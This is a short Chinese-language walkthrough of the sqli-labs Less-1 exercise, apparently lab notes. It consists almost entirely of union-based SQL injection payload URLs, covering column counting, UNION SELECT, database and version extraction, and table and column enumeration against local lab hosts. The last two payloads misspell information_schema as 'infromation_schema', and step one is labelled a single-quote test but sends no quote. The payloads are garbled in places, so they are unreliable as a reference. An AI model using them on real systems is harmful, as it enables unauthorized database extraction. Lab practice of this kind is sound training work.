一.单引号测试
http://127.0.0.1/sqli/Less-1/?id=1 and 1=1
二.确定字段数
http://192.168.162.135/sqlilab/Less-1/?id=1' order by 1 --+
正常无报错
逐字增加个数判断出字段数为3
三.使用联合查询,确定显示位置
http://192.168.162.135/sqlilab/Less-1/?id=-1' union select 1,2,3 --+
四.确认位置后,查询库名
http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,database(),version() -- +
字段数为3,所以1在这表示占位,version()查询数据库版本,database()查询数据库库名
五.查询表名和列名
http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(table_name),3 from infromation_schema.tables where table_schema='security' -- +
http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(column_name),3 from infromation_schema.columns where table_schema='security' and table_name='users'-- +